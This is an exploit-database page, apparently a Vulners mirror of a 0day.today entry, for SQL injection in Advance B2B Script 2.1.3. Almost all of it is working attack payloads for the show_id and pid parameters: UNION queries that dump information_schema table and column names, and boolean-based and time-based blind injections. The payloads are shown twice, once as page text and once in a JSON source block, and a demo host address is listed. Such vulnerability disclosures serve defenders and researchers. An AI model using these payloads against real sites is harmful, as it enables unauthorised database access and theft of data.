Search...

Advance B2B Script 2.1.3 - show_id / pid SQL Injection Vulnerability

2017-12-10T00:00:00

ID 1337DAY-ID-29154
Type zdt
Reporter Ihsan Sencan
Modified 2017-12-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # # # # # 
# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/
# Demo: http://198.38.86.159/~advancedb2b/
# Version: 2.1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]
# 
# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)[email protected]:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
# 
# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)[email protected]:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
# 
# Parameter: show_id (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO
# 
#     Type: UNION query
#     Title: Generic UNION query (NULL) - 67 columns
#     Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl
# 
# 2)
# http://localhost/[PATH]/view-product.php?pid=[SQL]
# 
# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
# 
# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
# 
# Parameter: pid (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef
# 
#     Type: AND/OR time-based blind
#     Title: MySQL &gt;= 5.0.12 AND time-based blind
#     Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS
# 
#     Type: UNION query
#     Title: Generic UNION query (NULL) - 33 columns
#     Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm
# 
# # # # #

#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"sourceData": "# # # # # \r\n# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection\r\n# Dork: N/A\r\n# Date: 08.12.2017\r\n# Vendor Homepage: https://www.phpscriptsmall.com/\r\n# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/\r\n# Demo: http://198.38.86.159/~advancedb2b/\r\n# Version: 2.1.3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]\r\n# \r\n# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-\r\n# \r\n# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-\r\n# \r\n# Parameter: show_id (GET)\r\n# Type: boolean-based blind\r\n# Title: AND boolean-based blind - WHERE or HAVING clause\r\n# Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO\r\n# \r\n# Type: UNION query\r\n# Title: Generic UNION query (NULL) - 67 columns\r\n# Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/view-product.php?pid=[SQL]\r\n# \r\n# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-\r\n# \r\n# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-\r\n# \r\n# Parameter: pid (GET)\r\n# Type: boolean-based blind\r\n# Title: AND boolean-based blind - WHERE or HAVING clause\r\n# Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef\r\n# \r\n# Type: AND/OR time-based blind\r\n# Title: MySQL >= 5.0.12 AND time-based blind\r\n# Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS\r\n# \r\n# Type: UNION query\r\n# Title: Generic UNION query (NULL) - 33 columns\r\n# Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm\r\n# \r\n# # # # #\n\n# 0day.today [2018-01-05] #", "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/29154", "reporter": "Ihsan Sencan", "href": "https://0day.today/exploit/description/29154", "type": "zdt", "viewCount": 7, "references": [], "lastseen": "2018-01-05T19:13:53", "published": "2017-12-10T00:00:00", "cvelist": [], "id": "1337DAY-ID-29154", "modified": "2017-12-10T00:00:00", "title": "Advance B2B Script 2.1.3 - show_id / pid SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-01-05T19:13:53", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-05T19:13:53", "rev": 2}, "vulnersScore": 0.6}, "immutableFields": []}